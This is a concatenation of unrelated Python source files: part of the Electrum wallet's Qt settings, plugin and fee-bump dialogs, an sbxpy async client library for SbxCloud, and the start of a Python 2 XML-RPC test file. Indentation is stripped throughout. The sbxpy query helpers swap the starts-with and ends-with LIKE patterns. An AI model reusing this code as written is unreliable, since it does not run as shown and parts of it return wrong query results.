self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat.') + '\n' +
_('If enabled, at most 100 satoshis might be lost due to this, per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_list.refresh_headers()
if self.fx.is_enabled() and checked:
# reset timeout to get historical rates
self.fx.timeout = 0
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('Appearance')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.timeout = 0
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
name = descr['__name__']
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
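# The checkbox is enabled when the plugin is not loaded but available for
# this wallet, or when it is loaded and the user is allowed to disable it.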
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stdout)
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
def f(x):
a = max_fee - fee_e.get_amount()
output_amount.setText((self.format_amount(a) + ' ' + self.base_unit()) if a else '')
fee_e.textChanged.connect(f)
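# fee_per_kb() is a rate per 1000 bytes, so scaling it by the combined size
# of the parent and child transactions gives the suggested total CPFP fee.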
fee = self.config.fee_per_kb() * total_size / 1000
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee' + ':')), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * total_size / 1000
fee = min(max_fee, fee)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('Current fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('New fee' + ':')))
fee_e = BTCAmountEdit(self.get_decimal_point)
fee_e.setAmount(fee * 1.5)
vbox.addWidget(fee_e)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * tx_size / 1000
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee = fee_e.get_amount()
delta = new_fee - fee
if delta < 0:
self.show_error("fee too low")
return
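# Note: the wallet call below takes the fee increment (delta), not the new
# absolute fee, which is why only the difference is passed on.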
try:
new_tx = self.wallet.bump_fee(tx, delta)
except BaseException as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
try:
if not self.wallet.add_transaction(tx.txid(), tx):
self.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
self.show_error(e)
return False
else:
self.wallet.save_transactions(write=True)
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
self.show_message(_("Transaction saved successfully"))
return True
|
__init__.py
|
from sbxpy.QueryBuilder import QueryBuilder as Qb
import aiohttp
import asyncio
import copy
import math
from threading import Thread
'''
:mod:`sbxpy` -- Main Library
===================================
.. module:: sbxpy
:platform: Unix, Windows
:synopsis: This is the module that uses QueryBuilder to create all the requests used to communicate with SbxCloud
.. moduleauthor:: Luis Guzman <lgguzman890414@gmail.com>
'''
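# Minimal usage sketch (illustrative only; the domain, app key, URL and model
# below are placeholder values and assume a reachable SbxCloud endpoint):
#
#   import asyncio
#   from sbxpy import SbxCore
#
#   async def main():
#       core = SbxCore()
#       core.initialize('my_domain', 'my_app_key', 'https://sbxcloud.com/api')
#       await core.login('user', 'password', 'my_domain')
#       rows = await core.with_model('box').and_where_is_equal('status', 'open').find()
#       print(rows)
#
#   asyncio.run(main())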
class Find:
def __init__(self, model, sbx_core):
self.query = Qb().set_domain(sbx_core.environment['domain']).set_model(model)
self.lastANDOR = None
self.sbx_core = sbx_core
self.url = self.sbx_core.urls['find']
def compile(self):
return self.query.compile()
def new_group_with_and(self):
self.query.new_group('AND')
self.lastANDOR = None
return self
def new_group_with_or(self):
self.query.new_group('OR')
self.lastANDOR = None
return self
def and_where_is_equal(self, field, value):
self.lastANDOR = 'AND'
self.query.add_condition(self.lastANDOR, field, '=', value)
return self
def and_where_is_not_null(self, field):
self.lastANDOR = 'AND'
self.query.add_condition(self.lastANDOR, field, 'IS NOT', None)
return self
def and_where_is_null(self, field):
self.lastANDOR = 'AND'
self.query.add_condition(self.lastANDOR, field, 'IS', None)
return self
def and_where_greater_than(self, field, value):
self.lastANDOR = 'AND'
self.query.add_condition(self.lastANDOR, field, '>', value)
return self
def and_where_less_than(self, field, value):
self.lastANDOR = 'AND'
self.query.add_condition(self.lastANDOR, field, '<', value)
return self
def and_where_greater_or_equal_than(self, field, value):
self.lastANDOR = 'AND'
self.query.add_condition(self.lastANDOR, field, '>=', value)
return self
def and_where_less_or_equal_than(self, field, value):
self.lastANDOR = 'AND'
self.query.add_condition(self.lastANDOR, field, '<=', value)
return self
def and_where_is_not_equal(self, field, value):
self.lastANDOR = 'AND'
self.query.add_condition(self.lastANDOR, field, '!=', value)
return self
def and_where_starts_with(self, field, value):
self.lastANDOR = 'AND'
self.query.add_condition(self.lastANDOR, field, 'LIKE', '%' + value)
return self
def and_where_ends_with(self, field, value):
self.lastANDOR = 'AND'
self.query.add_condition(self.lastANDOR, field, 'LIKE', value + '%')
return self
def and_where_contains(self, field, value):
self.lastANDOR = 'AND'
self.query.add_condition(self.lastANDOR, field, 'LIKE', '%' + value + '%')
return self
def and_where_in(self, field, value):
self.lastANDOR = 'AND'
self.query.add_condition(self.lastANDOR, field, 'IN', value)
return self
def and_where_not_in(self, field, value):
self.lastANDOR = 'AND'
self.query.add_condition(self.lastANDOR, field, 'NOT IN', value)
return self
def or_where_is_equal(self, field, value):
self.lastANDOR = 'AND' if (self.lastANDOR is None) else 'OR'
self.query.add_condition(self.lastANDOR, field, '=', value)
return self
def or_where_is_not_null(self, field):
self.lastANDOR = 'AND' if (self.lastANDOR is None) else 'OR'
self.query.add_condition(self.lastANDOR, field, 'IS NOT', None)
return self
def or_where_is_null(self, field):
self.lastANDOR = 'AND' if (self.lastANDOR is None) else 'OR'
self.query.add_condition(self.lastANDOR, field, 'IS', None)
return self
def or_where_greater_than(self, field, value):
self.lastANDOR = 'AND' if (self.lastANDOR is None) else 'OR'
self.query.add_condition(self.lastANDOR, field, '>', value)
return self
def or_where_less_than(self, field, value):
self.lastANDOR = 'AND' if (self.lastANDOR is None) else 'OR'
self.query.add_condition(self.lastANDOR, field, '<', value)
return self
def or_where_greater_or_equal_than(self, field, value):
self.lastANDOR = 'AND' if (self.lastANDOR is None) else 'OR'
self.query.add_condition(self.lastANDOR, field, '>=', value)
return self
def or_where_less_or_equal_than(self, field, value):
self.lastANDOR = 'AND' if (self.lastANDOR is None) else 'OR'
self.query.add_condition(self.lastANDOR, field, '<=', value)
return self
def or_where_is_not_equal(self, field, value):
self.lastANDOR = 'AND' if (self.lastANDOR is None) else 'OR'
self.query.add_condition(self.lastANDOR, field, '!=', value)
return self
def or_where_starts_with(self, field, value):
self.lastANDOR = 'AND' if (self.lastANDOR is None) else 'OR'
self.query.add_condition(self.lastANDOR, field, 'LIKE', '%' + value)
return self
def or_where_ends_with(self, field, value):
self.lastANDOR = 'AND' if (self.lastANDOR is None) else 'OR'
self.query.add_condition(self.lastANDOR, field, 'LIKE', value + '%')
return self
def or_where_contains(self, field, value):
self.lastANDOR = 'AND' if (self.lastANDOR is None) else 'OR'
self.query.add_condition(self.lastANDOR, field, 'LIKE', '%' + value + '%')
return self
def or_where_in(self, field, value):
self.lastANDOR = 'AND' if (self.lastANDOR is None) else 'OR'
self.query.add_condition(self.lastANDOR, field, 'IN', value)
return self
def or_where_not_in(self, field, value):
self.lastANDOR = 'AND' if (self.lastANDOR is None) else 'OR'
self.query.add_condition(self.lastANDOR, field, 'NOT IN', value)
return self
def or_where_reference_join_between(self, field, reference_field):
return ReferenceJoin(self, field, reference_field, 'OR')
def and_where_reference_join_between(self, field, reference_field):
return ReferenceJoin(self, field, reference_field, 'AND')
def where_with_keys(self, keys):
self.query.where_with_keys(keys)
return self
def order_by(self, field, asc):
self.query.order_by(field, asc)
return self
def fetch_models(self, array):
self.query.fetch_models(array)
return self
def reverse_fetch(self, array):
self.query.reverse_fetch(array)
return self
def set_page(self, page):
self.query.set_page(page)
return self
def set_page_size(self, size):
self.query.set_page_size(size)
return self
async def __then(self, query_compiled):
async with aiohttp.ClientSession() as session:
async with session.post(
self.sbx_core.p(self.url), json=query_compiled,
headers=self.sbx_core.get_headers_json()) as resp:
print("sent")
r = await resp.json()
print("response")
return r
def set_url(self, is_find):
self.url = self.sbx_core.urls['find'] if is_find else self.sbx_core.urls['delete']
async def find(self):
self.set_url(True)
return await self.__then(self.query.compile())
def find_callback(self, callback):
self.sbx_core.make_callback(self.find(), callback)
async def find_all_query(self, page_size=1000, max_in_parallel=2):
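# Fetch the first page to learn the total page count, then build one request
# per page, group them with __chunk_it, await the groups and accumulate the
# responses.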
self.set_page_size(page_size)
self.set_url(True)
queries = []
query_compiled = self.query.compile()
data = await self.__then(query_compiled)
total_pages = data['total_pages']
for i in range(total_pages+1):
query_aux = copy.deepcopy(query_compiled)
query_aux['page'] = (i + 1)
queries.append(self.__then(query_aux))
futures = self.__chunk_it(queries, min(max_in_parallel, len(queries)))
results = await asyncio.gather(*[futures[i] for i in range(len(futures))])
data = []
for i in range(len(results)):
for j in range(len(results[i])):
data.extend(results[i][j])
return data
def find_all_callback(self, callback):
self.sbx_core.make_callback(self.find_all_query(), callback)
def __chunk_it(self, seq, num):
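# Split `seq` into `num` roughly equal slices, wrapping each slice in an
# asyncio.gather so callers can await the slices as grouped futures.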
avg = len(seq) / float(num)
out = []
last = 0.0
while last < len(seq):
out.append(asyncio.gather(*seq[int(last):int(last + avg)]))
last += avg
return out
class ReferenceJoin:
def __init__(self, find, field, reference_field, types):
self.find = find
self.field = field
self.reference_field = reference_field
if types == 'AND':
self.find.and_where_in(self.field, '@reference_join@')
else:
self.find.or_where_in(self.field, '@reference_join@')
def in_model(self, reference_model):
return FilterJoin(self.find, self.field, self.reference_field, reference_model)
class FilterJoin:
def __init__(self, find, field, reference_field, reference_model):
self.find = find
self.field = field
self.reference_field = reference_field
self.reference_model = reference_model
def filter_where_is_equal(self, value):
self.find.query.setReferenceJoin('=', self.field, self.reference_field, self.reference_model, value)
return self.find
def filter_where_is_not_null(self, value):
self.find.query.setReferenceJoin('IS NOT', self.field, self.reference_field, self.reference_model, value)
return self.find
def filter_where_is_null(self, value):
self.find.query.setReferenceJoin('IS', self.field, self.reference_field, self.reference_model, value)
return self.find
def filter_where_greater_than(self, value):
self.find.query.setReferenceJoin('>', self.field, self.reference_field, self.reference_model, value)
return self.find
def filter_where_less_than(self, value):
self.find.query.setReferenceJoin('<', self.field, self.reference_field, self.reference_model, value)
return self.find
def filter_where_greater_or_equal_than(self, value):
self.find.query.setReferenceJoin('>=', self.field, self.reference_field, self.reference_model, value)
return self.find
def filter_where_less_or_equal_than(self, value):
self.find.query.setReferenceJoin('<=', self.field, self.reference_field, self.reference_model, value)
return self.find
def filter_where_is_not_equal(self, value):
self.find.query.setReferenceJoin('!=', self.field, self.reference_field, self.reference_model, value)
return self.find
def filter_where_like(self, value):
self.find.query.setReferenceJoin('LIKE', self.field, self.reference_field, self.reference_model, value)
return self.find
def filter_where_in(self, value):
self.find.query.setReferenceJoin('IN', self.field, self.reference_field, self.reference_model, value)
return self.find
def filter_where_not_in(self, value):
self.find.query.setReferenceJoin('NOT IN', self.field, self.reference_field, self.reference_model, value)
return self.find
class SbxCore:
'''
This is the core of the communication with SbxCloud.
Concurrent tasks are run with asyncio.
Requests are made with aiohttp.
'''
environment = {}
headers = {}
urls = {
'update_password': '/user/v1/password',
'login': '/user/v1/login',
'register': '/user/v1/register',
'validate': '/user/v1/validate',
'row': '/data/v1/row',
'find': '/data/v1/row/find',
'update': '/data/v1/row/update',
'delete': '/data/v1/row/',
'downloadFile': '/content/v1/download',
'uploadFile': '/content/v1/upload',
'addFolder': '/content/v1/folder',
'folderList': '/content/v1/folder',
'send_mail': '/email/v1/send',
'payment_customer': '/payment/v1/customer',
'payment_card': '/payment/v1/card',
'payment_token': '/payment/v1/token',
'password': '/user/v1/password/request',
'cloudscript_run': '/cloudscript/v1/run',
'domain': '/data/v1/row/model/list'
}
def __init__(self, manage_loop=False):
'''
Create an instance of SbxCore.
:param manage_loop: whether the event loop is managed by the library
'''
self.loop = None
self.t = None
if manage_loop:
def start_loop():
print('loop started')
self.loop.run_forever()
self.loop = asyncio.new_event_loop()
self.t = Thread(target=start_loop)
self.t.start()
def get_headers_json(self):
self.headers['Content-Type'] = 'application/json'
return self.headers
def p(self, path):
return self.environment['base_url'] + path
def initialize(self, domain, app_key, base_url):
self.environment['domain'] = domain
self.environment['base_url'] = base_url
self.environment['app_key'] = app_key
self.headers['App-Key'] = app_key
return self
def with_model(self, model):
return Find(model, self)
def query_builder_to_insert(self, data, let_null):
query = Qb().set_domain(self.environment['domain'])
if isinstance(data, list):
for item in data:
query.add_object(self.validate_data(item, let_null))
else:
query.add_object(self.validate_data(data, let_null))
return query
def is_update(self, data):
sw = False
if isinstance(data, list):
for item in data:
if "_KEY" in item:
sw = True
else:
if "_KEY" in data:
sw = True
return sw
def validate_data(self, data, let_null):
listkeys = [key for key in data if let_null or data[key] is not None]
temp = {}
for key in listkeys:
if data[key] is not None and isinstance(data[key], dict) and '_KEY' in data[key]:
data[key] = data[key]['_KEY']
temp[key] = data[key]
return temp
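# Example (illustrative values): validate_data({'name': 'box1', 'owner': {'_KEY': 'k-1'}, 'note': None}, False)
# returns {'name': 'box1', 'owner': 'k-1'}; reference dicts are collapsed to
# their '_KEY' and None values are dropped unless let_null is True.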
'''
======================================
Async Functions
======================================
'''
async def login(self, login, password, domain):
async with aiohttp.ClientSession() as session:
params = {'login': login, 'password': password, 'domain': domain}
async with session.get(self.p(self.urls['login']), params=params, headers=self.get_headers_json()) as resp:
data = await resp.json()
if data['success']:
self.headers['Authorization'] = 'Bearer ' + data['token']
return data
async def list_domain(self):
async with aiohttp.ClientSession() as session:
params = {'domain': self.environment['domain']}
async with session.get(self.p(self.urls['domain']), params=params, headers=self.get_headers_json()) as resp:
return await resp.json()
async def run(self, key, params):
async with aiohttp.ClientSession() as session:
params = {'key': key, 'params': params}
async with session.post(self.p(self.urls['cloudscript_run']), json=params,
headers=self.get_headers_json()) as resp:
return await resp.json()
async def upsert(self, model, data, let_null=False):
query = self.query_builder_to_insert(data, let_null).set_model(model).compile()
return await self.__then(query, self.is_update(data))
async def __then(self, query_compiled, update):
async with aiohttp.ClientSession() as session:
async with session.post(
self.p(self.urls['row'] if not update else self.urls['update']), json=query_compiled,
headers=self.get_headers_json()) as resp:
return await resp.json()
'''
======================================
Callback Functions
======================================
'''
def loginCallback(self, login, password, domain, call):
self.make_callback(self.login(login, password, domain), call)
def upsertCallback(self, model, data, call, let_null=False):
self.make_callback(self.upsert(model, data, let_null), call)
def make_callback(self, coroutine, call):
try:
if self.loop is None:
raise Exception('SbxCore must initialize with manage_loop True')
else:
# future = asyncio.ensure_future(
# coroutine, loop=self.loop)
def callback(fut):
call(None, fut.result())
# future.add_done_callback(callback)
future = asyncio.run_coroutine_threadsafe(coroutine, loop=self.loop)
future.add_done_callback(callback)
except Exception as inst:
call(inst, None)
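# Usage sketch (requires manage_loop=True so the background loop thread exists;
# the credentials and domain below are placeholders):
#
#   core = SbxCore(manage_loop=True)
#   core.initialize('my_domain', 'my_app_key', 'https://sbxcloud.com/api')
#   core.loginCallback('user', 'password', 'my_domain',
#                      lambda error, data: print(error or data))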
def close_connection(self):
if self.loop is not None:
if self.loop.is_running():
asyncio.gather(*asyncio.all_tasks()).cancel()
self.loop.stop()
class EventQuery:
def __init__(self, event, sbx_event):
self.sbx_event = sbx_event
self.url = self.sbx_event.urls['list'] + "/" + sbx_event.environment['domain'] + "/" + event
async def then(self, params):
async with aiohttp.ClientSession() as session:
async with session.get(
self.sbx_event.p(self.url), params=params,
headers=self.sbx_event.get_headers_json()) as resp:
return await resp.json()
class SbxEvent:
'''
This is the core of the communication with SbxEvent.
Concurrent tasks are run with asyncio.
Requests are made with aiohttp.
curl --request GET \
--url 'https://sbx-svc-event-test.nubesocobox.com/api/event/129/ibf_delete_box?fromDate=2021-02-28T18%3A30%3A00.000Z&toDate=2021-04-23T14%3A12%3A04.990Z' \
--header 'accept-encoding: gzip, deflate, br' \
--header 'sbx-secret: '
'''
environment = {}
headers = {}
urls = {
'list': '/api/event'
}
def __init__(self, manage_loop=False):
'''
Create an instance of SbxEvent.
:param manage_loop: whether the event loop is managed by the library
'''
self.loop = None
self.t = None
if manage_loop:
def start_loop():
print('loop started')
self.loop.run_forever()
self.loop = asyncio.new_event_loop()
self.t = Thread(target=start_loop)
self.t.start()
def get_headers_json(self):
self.headers['Content-Type'] = 'application/json'
self.headers['accept-encoding'] = 'gzip, deflate, br'
return self.headers
def p(self, path):
return self.environment['base_url'] + path
def initialize(self, domain, app_key, base_url):
self.environment['domain'] = domain
self.environment['base_url'] = base_url
self.environment['sbx-secret'] = app_key
self.headers['sbx-secret'] = app_key
return self
def with_event(self, event):
return EventQuery(event, self)
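# Usage sketch (values are placeholders mirroring the curl example above, and
# the call must run inside an async context):
#
#   events = SbxEvent()
#   events.initialize('129', 'my-sbx-secret', 'https://sbx-svc-event-test.nubesocobox.com')
#   data = await events.with_event('ibf_delete_box').then(
#       {'fromDate': '2021-02-28T18:30:00.000Z', 'toDate': '2021-04-23T14:12:04.990Z'})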
class WorkflowQuery:
def __init__(self, sbx_workflow):
self.sbx_workflow = sbx_workflow
self.url = self.sbx_workflow.urls['api'] + self.sbx_workflow.environment['domain'] + self.sbx_workflow.urls['list_process_execution']
def __chunk_it(self, seq, num):
avg = len(seq) / float(num)
out = []
last = 0.0
while last < len(seq):
out.append(asyncio.gather(*seq[int(last):int(last + avg)]))
last += avg
return out
async def then(self, params):
async with aiohttp.ClientSession() as session:
async with session.get(
self.sbx_workflow.p(self.url), params=params,
headers=self.sbx_workflow.get_headers_json()) as resp:
return await resp.json()
async def find_all(self, params, page_size=1000, max_in_parallel=2):
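# Fetch the first page to read 'totalCount', then request every page in
# chunked batches and return the list of raw page responses.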
params['size'] = page_size
params['page'] = 0
queries = []
data = []
temp = await self.then(params)
total_pages = math.ceil(temp['totalCount']/page_size)
for i in range(total_pages):
params_aux = copy.deepcopy(params)
params_aux['page'] = i
queries.append(self.then(params_aux))
if len(queries) > 0:
futures = self.__chunk_it(queries, min(max_in_parallel, len(queries)))
results = await asyncio.gather(*[futures[i] for i in range(len(futures))])
for i in range(len(results)):
for j in range(len(results[i])):
data.append(results[i][j])
else:
data.append(temp)
return data
class SbxWorkflow:
'''
This is the core of the communication with SbxWorkflow.
Concurrent tasks are run with asyncio.
Requests are made with aiohttp.
curl --request GET \
--url 'https://sbx-svc-event-test.nubesocobox.com/api/event/129/ibf_delete_box?fromDate=2021-02-28T18%3A30%3A00.000Z&toDate=2021-04-23T14%3A12%3A04.990Z' \
--header 'accept-encoding: gzip, deflate, br' \
--header 'sbx-secret: '
'''
environment = {}
headers = {}
urls = {
'api': '/api/v2/',
'list_process_execution': '/wf/process/execution',
}
def __init__(self, manage_loop=False):
'''
Create an instance of SbxWorkflow.
:param manage_loop: whether the event loop is managed by the library
'''
self.loop = None
self.t = None
if manage_loop:
def start_loop():
print('loop started')
self.loop.run_forever()
self.loop = asyncio.new_event_loop()
self.t = Thread(target=start_loop)
self.t.start()
def get_headers_json(self):
self.headers['Content-Type'] = 'application/json'
self.headers['accept-encoding'] = 'gzip, deflate, br'
return self.headers
def p(self, path):
return self.environment['base_url'] + path
def initialize(self, domain, base_url):
self.environment['domain'] = domain
self.environment['base_url'] = base_url
return self
def with_process_execution(self):
return WorkflowQuery(self)
class UserQuery:
def __init__(self, crm_user):
self.crm_user = crm_user
self.url = self.crm_user.urls['api'] + self.crm_user.environment['domain'] + self.crm_user.urls[
'list_users']
def __chunk_it(self, seq, num):
avg = len(seq) / float(num)
out = []
last = 0.0
while last < len(seq):
out.append(asyncio.gather(*seq[int(last):int(last + avg)]))
last += avg
return out
async def then(self, params):
async with aiohttp.ClientSession() as session:
async with session.get(
self.crm_user.p(self.url), params=params,
headers=self.crm_user.get_headers_json()) as resp:
return await resp.json()
async def find_all(self, params, page_size=1000, max_in_parallel=2):
params['size'] = page_size
params['page'] = 0
queries = []
data = []
temp = await self.then(params)
total_pages = math.ceil(temp['totalCount'] / page_size)
for i in range(total_pages):
params_aux = copy.deepcopy(params)
params_aux['page'] = i
queries.append(self.then(params_aux))
if len(queries) > 0:
futures = self.__chunk_it(queries, min(max_in_parallel, len(queries)))
results = await asyncio.gather(*[futures[i] for i in range(len(futures))])
for i in range(len(results)):
for j in range(len(results[i])):
data.append(results[i][j])
else:
data.append(temp)
return data
class SbxCRMUser:
'''
This is the core of the communication with SbxCRMUser.
Concurrent tasks are run with asyncio.
Requests are made with aiohttp.
curl --request GET \
--url 'https://sbx-svc-event-test.nubesocobox.com/api/event/129/ibf_delete_box?fromDate=2021-02-28T18%3A30%3A00.000Z&toDate=2021-04-23T14%3A12%3A04.990Z' \
--header 'accept-encoding: gzip, deflate, br' \
--header 'sbx-secret: '
'''
environment = {}
headers = {}
urls = {
'api': '/api/v2/',
'list_users': '/security/auth/users',
}
def __init__(self, manage_loop=False):
'''
Create an instance of SbxCRMUser.
:param manage_loop: whether the event loop is managed by the library
'''
self.loop = None
self.t = None
if manage_loop:
def start_loop():
print('loop started')
self.loop.run_forever()
self.loop = asyncio.new_event_loop()
self.t = Thread(target=start_loop)
self.t.start()
def get_headers_json(self):
self.headers['Content-Type'] = 'application/json'
self.headers['accept-encoding'] = 'gzip, deflate, br'
return self.headers
def p(self, path):
return self.environment['base_url'] + path
def initialize(self, domain, base_url):
self.environment['domain'] = domain
self.environment['base_url'] = base_url
return self
def with_process_execution(self):
return UserQuery(self)
|
test_xmlrpc.py
|
import base64
import datetime
import sys
import time
import unittest
import xmlrpclib
import SimpleXMLRPCServer
import threading
import mimetools
import httplib
import socket
import os
from test import test_support
try:
unicode
except NameError:
have_unicode = False
else:
have_unicode = True
alist = [{'astring': 'foo@bar.baz.spam',
'afloat': 7283.43,
'anint': 2**20,
'ashortlong': 2L,
'anotherlist': ['.zyx.41'],
